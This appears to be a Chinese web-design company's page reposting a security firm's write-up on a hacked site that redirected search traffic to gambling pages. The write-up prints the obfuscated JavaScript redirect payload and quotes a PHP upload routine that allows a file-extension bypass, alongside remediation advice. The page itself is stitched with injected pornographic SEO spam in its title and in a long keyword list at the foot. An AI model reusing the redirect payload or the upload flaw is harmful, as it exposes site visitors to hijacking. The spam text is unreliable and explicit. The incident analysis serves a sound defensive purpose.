成人无码网www在线观看-久激情内射婷内射蜜桃-亚洲欧美日韩久久精品-婷婷五月综合激情

咨詢熱線:

185-9527-1032

聯系QQ:

2863379292

官方微信:

網站標題被篡改成北京賽車、PK10的解決處理辦法

建站經驗

導讀:客戶網站于近日被跳轉到賭博網站,打開后直接跳轉到什么北京賽車,pK10等內容的網站上去,客戶網站本身做了百度的推廣,導致所有訪問用戶都跳轉到賭博網站上去,給客戶帶來很大的經濟

發表日期:2019-06-08

文章編輯:興田科技

瀏覽次數:10203

標簽:

客戶網站于近日被跳轉到賭博網站,打開后直接跳轉到什么北京賽車,pK10等內容的網站上去,客戶網站本身做了百度的推廣,導致所有訪問用戶都跳轉到賭博網站上去,給客戶帶來很大的經濟損失,再一個官方網站的形象也受到了影響。我們SINE安全對客戶網站進行檢查發現,客戶網站的標題TDK被反復篡改成(北京賽車pK10等內容)立刻對該客戶網站的安全,進行全面的源代碼安全審計以及網站漏洞檢測與網站漏洞修復,檢查了客戶的首頁標題TDK內容確實是被篡改,并添加了一些加密的惡意代碼,代碼如下:

type="text/java"eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c]);return p;}('m["9d1lian0"]["8460a"]('h314620 0k2ae70aq05gbfb3146207 341e7o0023p55888c129b3rc1di599f62cg37jh5314620j');',28,28,'x74|x63|x70|x73|x72|x2f|x69|x22|x77|x64|x65|x61|x2e|x6f|x3d|x76|x6a|x3c|x6d|x3e|x79|x75|window|x6e|x68|x3a|x78|x38'.split('|'),0,{}))

上述網站代碼是ASCII編碼,只要轉換成Unicode編碼,就可以看到加密的真實內容。我們工程師對代碼進行解讀,發現該代碼寫的是根據搜索引擎作為判斷條件進行跳轉的代碼,通俗來講就是說,該代碼只針對搜索引擎,網站管理員直接輸入網址并不會發現網站跳轉到賭博內容網站上去,客戶的網站通過百度或搜狗搜索會直接跳轉到這個北京賽車、pk10的網站上去。

針對于上述的問題,我們立即刪除加密的跳轉代碼,先將客戶網站損失降到最低,促使網站正常訪問(因為客戶一直在做百度推廣,一直在燒錢),通過一系列的安全檢測,網站到底是因為那些漏洞被上傳木馬,并篡改網站首頁的呢?經過我們Sine安全工程師對網站代碼的詳細的安全檢測后,發現該網站系統存在SQL注入漏洞,導致攻擊者可以獲取到管理員賬戶和密碼,而網站后臺的地址用的也是默認的admin目錄名,致使黑客獲取密碼后,直接登錄網站后臺,在對網站后臺安全檢測的時候,發現產品圖片上傳功能,存在繞過格式上傳腳本木馬的漏洞。

該網站漏洞產生于網站后臺的產品上傳頁面代碼中的$this->getext($filear["name"]); //取得擴展名$this->set_savename($file); //設置保存文件名,這個代碼對文件擴展名可以直接繞過并上傳php格式的腳本文件,從而讓攻擊者輕易取得網站的權限。客戶還反映說,網站經常被反復的篡改,導致跳轉到賭博網站,找了網站建設的公司,他們也只是刪除掉代碼,沒過多久就又被篡改跳轉了,導致客戶網站損失嚴重,發生篡改跳轉的根本原因就是網站有漏洞,如果沒有修復好網站漏洞,即使刪除掉惡意代碼也只是表面上的工作,不起作用的還是會被反復篡改,于事無補,亡羊補牢一樣。需要對網站進行安全檢測,以及網站漏洞檢測,并修復好網站漏洞,清除木馬后門,網站安全部署好,才會使網站更加的安全穩定運行。

網站漏洞修復的處理過程如下:

對客戶網站源代碼進行安全加固以及防止sql注入的前端過濾代碼,網站的后臺目錄安全設置,更改admin文件名為@#%admin,對網站后臺圖片上傳功能代碼進行漏洞修復,設置上傳文件白名單機制,以及文件上傳的目錄進行了腳本安全權限設置,禁止進行腳本,對上傳的文件擴展也進行了深入的安全過濾,網站的數據庫安全部署,對數據庫的連接信息進行加密,刪除root管理權限,設置普通數據庫賬號,讀寫分離,新建表,查詢表,寫入表等數據庫正常操作權限,網站后臺的賬號密碼設置的復雜一些,密碼為12位數字+字母+大小寫組合,從發現網站漏洞到目前解決問題中,共查找到腳本木馬3個(webshell),一句話小馬后門2個,發現網站的模板內容也被篡改了,導致客戶生成首頁的時候隨之也被加了惡意加密的代碼。

網站安全預防措施:

1.盡量避免網站后臺的默認名稱如admin manage houtai

2.對網站上傳目錄的權限進行控制。(設置無腳本執行權限)

3.網站后臺的用戶名和密碼設置復雜點,數字+字母+大小寫+特殊符號組合。

4.阿里云虛擬主機用戶的FTp賬號密碼要設置復雜點,數字+字母+大小寫+特殊符號組合。

5.如果是單獨服務器的客戶,建議先把服務器的安全部署好,對每個網站的文件夾進行安全部署,數據庫安全部署,,再做網站的安全,否則你網站再安全,服務器不安全也是于事無補。如果對安全不是太懂的話,建議找專業的網站安全公司去處理解決。

本文來源:A5

相關推薦

更多新聞

  • 5-30

    2020

    建站經驗 / 2020-05-30

    如何策劃一場活動?(創意篇)

    小張是一家攝影公司的新媒體運營, 老板要他策劃一個活動,目的是吸引更多的粉絲和完成一定的付費轉化。 小張該怎么做呢?在日常工作中, 策劃一場活動主要分為兩個部分創造(創意)和

    View details

  • 11-10

    2020

    建站經驗 / 2020-11-10

    果斷收藏:企業網站建站有什么好處?

      關于網站建設,您不僅可以用文字、圖片、動畫等方式宣傳自己的產品,而且可以介紹自己的企業,發布企業新聞,介紹企業領導,公布公司業績,提供售后服務,舉辦產品

    View details

  • 8-23

    2023

    建站經驗 / 2023-08-23

    東平網站建設- 為您的業務提供全方位的在線展示和營銷工具

    無論您是剛剛起步的創業公司還是已經成熟的企業,東平網站建設都是一個重要且不可忽視的環節。通過選擇合適的網站建設服務供應商,并遵循最佳的數字營銷策略,您可以將網站打造成一個全方位的在線展示和營銷工具,為您的業務發展提供強大的支持。立即行動,將您的業務帶入數字化的未來!

    View details

  • 11-10

    2020

    建站經驗 / 2020-11-10

    漲知識!網站建設中關鍵字該如何來選擇?

      關于網站建設,很多中小企業已經意識到建設網站對企業推廣的重要性,少部分企業進行了相關的優化,讓企業的產品或者能夠提供的服務在搜索引擎上得到較好的

    View details

主站蜘蛛池模板: 欧美精品久久久久a片软件| 欧美 国产 综合 欧美 视频| 免费少妇荡乳情欲视频| 无码一区二区三区av免费| 国产精品亚韩精品无码a在线| 少妇愉情理伦片丰满丰满午夜| 真人做人试看60分钟免费视频| 中国娇小与黑人巨大交| 五月天精品视频在线观看| 国产动作大片中文字幕| 精品国产一区二区三区无码| 久久综合精品国产一区二区三区无码 | 成人午夜国产内射主播| 国产精品毛片无遮挡高清| 国产精品无码av在线播放| 欧美性猛交xxxx乱大交3 | 97久久精品人人做人人爽| 九九综合九色综合网站| 日韩欧美一区二区三区免费观看| 伊人成色综合网| 久久久久99精品成人片三人毛片 | 中文字日产幕码三区的做法大全| 亚洲日韩国产二区无码| 国产精品久久久久久亚洲影视| 好深好湿好硬顶到了好爽| 国产午夜无码视频免费网站 | 护士张开腿被奷日出白浆| 在线亚洲+欧美+日本专区| 日韩精品真人荷官无码| 中文字幕免费在线观看动作大片 | 少妇高潮流白浆在线观看| a级毛片免费网站| 国产精品国产三级国产av中文| 久久人午夜亚洲精品无码区| 人妻系列av无码专区| 欧美 日韩 国产 亚洲 色| 久久精品国产久精国产一老狼 | 国产精品区免费视频| 酒店大战丝袜高跟鞋人妻| 国模无码视频一区二区三区| 精品久久欧美熟妇www|